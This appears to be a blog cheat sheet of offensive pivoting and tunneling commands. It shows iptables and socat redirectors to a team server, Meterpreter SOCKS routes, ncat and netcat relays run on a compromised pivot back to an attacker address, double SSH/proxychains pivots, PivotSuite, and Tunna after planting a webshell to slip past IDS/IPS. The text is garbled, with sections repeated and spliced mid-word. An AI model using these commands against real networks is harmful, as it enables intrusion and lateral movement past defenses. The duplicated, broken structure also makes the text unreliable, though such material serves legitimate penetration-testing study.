Pivots forwarders relays

Network
Created At :
Count:1.4k Views 👀 :
  1. HTTP Forwarding with iptables
  2. HTTP Forwarding with SOCAT
  3. SSH pivot
  4. Metasploit with Meterpreter
  5. Ncat HTTP proxy
  6. Ncat Port Forwarder
    1. HTTP Forwarding with SOCAT
    2. SSH pivot
    3. Metasploit with Meterpreter
    4. Ncat HTTP proxy
    5. Ncat Port Forwarder
    6. Netcat Port Forwarder
    7. Proxychains Setup
    8. Double Pivot Proxychains
    9. PivotSuite
    10. Tunna / Fulcrom (HTTP)
  7. Netcat Port Forwarder
  8. Proxy## HTTP Forwarding with iptables
    1. HTTP Forwarding with SOCAT
    2. SSH pivot
    3. Metasploit with Meterpreter
    4. Ncat HTTP proxy
    5. Ncat Port Forwarder
    6. Netcat Port Forwarder
    7. Proxychains Setup
    8. Double Pivot Proxychains
    9. PivotSuite
    10. Tunna / Fulcrom (HTTP)
  9. Double Pivot Proxychains
  10. PivotSuite
  11. Tunna / Fulcrom (HTTP)

HTTP Forwarding with iptables

My environment in this lab:

  • Team server and a listening port: 10.0.0.2:80
  • Re-director host and a listening port: 10.0.0.5:80
  • Victim host: 10.0.0.11

An easy way to create an HTTP re-director is to use a Linux box and its iptables capability.

iptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.2:80
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1

HTTP Forwarding with SOCAT

SOCAT is another tool that can be used to do the “dumb pipe” traffic forwarding.
The environment in this exercise remains the same as in the previous scenario.

Setting up an HTTP redirector with socat:

socat TCP4-LISTEN:80,fork TCP4:10.0.0.2:80

SSH pivot

ssh -D localhost:<local_proxy_port> -f -N <user>@<machine_to_pivot>

Metasploit with Meterpreter

msf5 >route add <network_to_proxy_in_CIDR_notation> <meterpreter_session_id>
[*] Route added
msf5 > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set SRVPORT 9050
SRVPORT => 9050
msf5 auxiliary(server/socks4a) > run -j

Ncat HTTP proxy

$ ncat -vv --listen 3128 --proxy-type http

Ncat Port Forwarder

On attacker machine:## HTTP Forwarding with iptables

My environment in this lab:

  • Team server and a listening port: 10.0.0.2:80
  • Re-director host and a listening port: 10.0.0.5:80
  • Victim host: 10.0.0.11

An easy way to create an HTTP re-director is to use a Linux box and its iptables capability.

iptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.2:80
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1

HTTP Forwarding with SOCAT

SOCAT is another tool that can be used to do the “dumb pipe” traffic forwarding.
The environment in this exercise remains the same as in the previous scenario.

Setting up an HTTP redirector with socat:

socat TCP4-LISTEN:80,fork TCP4:10.0.0.2:80

SSH pivot

ssh -D localhost:<local_proxy_port> -f -N <user>@<machine_to_pivot>

Metasploit with Meterpreter

msf5 >route add <network_to_proxy_in_CIDR_notation> <meterpreter_session_id>
[*] Route added
msf5 > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set SRVPORT 9050
SRVPORT => 9050
msf5 auxiliary(server/socks4a) > run -j

Ncat HTTP proxy

$ ncat -vv --listen 3128 --proxy-type http

Ncat Port Forwarder

On attacker machine:

$ ncat -lv --broker -m2 <port>

On pivot machine:

$ ncat -v <attacker_ip> <attacker_port> -c "ncat -v <host_to_pivot_to> <port_on_final_target"

Netcat Port Forwarder

On pivot machine:

mknod pivot p
nc -l -p <port_to_listen_on> 0<pivot | nc <ip_to_pivot_to> <port_to_pivot_to> 1>pivot

Proxychains Setup

Install and configure proxychains

tail /etc/proxychains.conf
#socks4 	127.0.0.1 9050
http 172.21.0.3  3128
#<type: http/socks4/socks5> <proxy_host> <proxy_port>

Double Pivot Proxychains

# Pivot 1 using proxychains
ssh -D 1080 user@IP_Network1

# Configure /etc/proxychains to set port 1080
# Pivot 2 using proxychains
proxychains ssh -D 1081 user@IP_Network2

# Configure /etc/proxychains to set port 1081

proxychains nmap...

PivotSuite

# Similar features to other tools but support multilevel pivot
# Like Metasploit

# "Remote" local port forwarding
# On the pivot
$ pivotsuite -S -F --server-option=PF --forward-ip=10.42.42.2 --forward-port=80 --server-ip=192.168.2.105 --server-port=8080

# "Remote" dynamic port forwarding
$ pivotsuite -S -F --server-option=SP --server-ip=192.168.2.105 --server-port=8080

Tunna / Fulcrom (HTTP)

# Everything is through HTTP 
# Bypass some IPS/IDS  

# First step is to deploy webshell on the target 
# Some are available with the tool (but not good) 
# Can be hard to use  

# Then on the attacker machine 
python2 proxy.py -u http://192.168.2.105:8080/conn.php -l 7777 -r 80 -a 10.42.42.2 -v
$ ncat -lv --broker -m2 <port>

On pivot machine:

$ ncat -v <attacker_ip> <attacker_port> -c "ncat -v <host_to_pivot_to> <port_on_final_target"

Netcat Port Forwarder

On pivot machine:

mknod pivot p
nc -l -p <port_to_listen_on> 0<pivot | nc <ip_to_pivot_to> <port_to_pivot_to> 1>pivot

Proxy## HTTP Forwarding with iptables

My environment in this lab:

  • Team server and a listening port: 10.0.0.2:80
  • Re-director host and a listening port: 10.0.0.5:80
  • Victim host: 10.0.0.11

An easy way to create an HTTP re-director is to use a Linux box and its iptables capability.

iptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.2:80
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1

HTTP Forwarding with SOCAT

SOCAT is another tool that can be used to do the “dumb pipe” traffic forwarding.
The environment in this exercise remains the same as in the previous scenario.

Setting up an HTTP redirector with socat:

socat TCP4-LISTEN:80,fork TCP4:10.0.0.2:80

SSH pivot

ssh -D localhost:<local_proxy_port> -f -N <user>@<machine_to_pivot>

Metasploit with Meterpreter

msf5 >route add <network_to_proxy_in_CIDR_notation> <meterpreter_session_id>
[*] Route added
msf5 > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set SRVPORT 9050
SRVPORT => 9050
msf5 auxiliary(server/socks4a) > run -j

Ncat HTTP proxy

$ ncat -vv --listen 3128 --proxy-type http

Ncat Port Forwarder

On attacker machine:

$ ncat -lv --broker -m2 <port>

On pivot machine:

$ ncat -v <attacker_ip> <attacker_port> -c "ncat -v <host_to_pivot_to> <port_on_final_target"

Netcat Port Forwarder

On pivot machine:

mknod pivot p
nc -l -p <port_to_listen_on> 0<pivot | nc <ip_to_pivot_to> <port_to_pivot_to> 1>pivot

Proxychains Setup

Install and configure proxychains

tail /etc/proxychains.conf
#socks4 	127.0.0.1 9050
http 172.21.0.3  3128
#<type: http/socks4/socks5> <proxy_host> <proxy_port>

Double Pivot Proxychains

# Pivot 1 using proxychains
ssh -D 1080 user@IP_Network1

# Configure /etc/proxychains to set port 1080
# Pivot 2 using proxychains
proxychains ssh -D 1081 user@IP_Network2

# Configure /etc/proxychains to set port 1081

proxychains nmap...

PivotSuite

# Similar features to other tools but support multilevel pivot
# Like Metasploit

# "Remote" local port forwarding
# On the pivot
$ pivotsuite -S -F --server-option=PF --forward-ip=10.42.42.2 --forward-port=80 --server-ip=192.168.2.105 --server-port=8080

# "Remote" dynamic port forwarding
$ pivotsuite -S -F --server-option=SP --server-ip=192.168.2.105 --server-port=8080

Tunna / Fulcrom (HTTP)

# Everything is through HTTP 
# Bypass some IPS/IDS  

# First step is to deploy webshell on the target 
# Some are available with the tool (but not good) 
# Can be hard to use  

# Then on the attacker machine 
python2 proxy.py -u http://192.168.2.105:8080/conn.php -l 7777 -r 80 -a 10.42.42.2 -v
```chains Setup

Install and configure proxychains

```bash
tail /etc/proxychains.conf
#socks4 	127.0.0.1 9050
http 172.21.0.3  3128
#<type: http/socks4/socks5> <proxy_host> <proxy_port>

Double Pivot Proxychains

# Pivot 1 using proxychains
ssh -D 1080 user@IP_Network1

# Configure /etc/proxychains to set port 1080
# Pivot 2 using proxychains
proxychains ssh -D 1081 user@IP_Network2

# Configure /etc/proxychains to set port 1081

proxychains nmap...

PivotSuite

# Similar features to other tools but support multilevel pivot
# Like Metasploit

# "Remote" local port forwarding
# On the pivot
$ pivotsuite -S -F --server-option=PF --forward-ip=10.42.42.2 --forward-port=80 --server-ip=192.168.2.105 --server-port=8080

# "Remote" dynamic port forwarding
$ pivotsuite -S -F --server-option=SP --server-ip=192.168.2.105 --server-port=8080

Tunna / Fulcrom (HTTP)

# Everything is through HTTP 
# Bypass some IPS/IDS  

# First step is to deploy webshell on the target 
# Some are available with the tool (but not good) 
# Can be hard to use  

# Then on the attacker machine 
python2 proxy.py -u http://192.168.2.105:8080/conn.php -l 7777 -r 80 -a 10.42.42.2 -v

©2021 Peanutstick's Blog

Built with Hexo and 3-hexo theme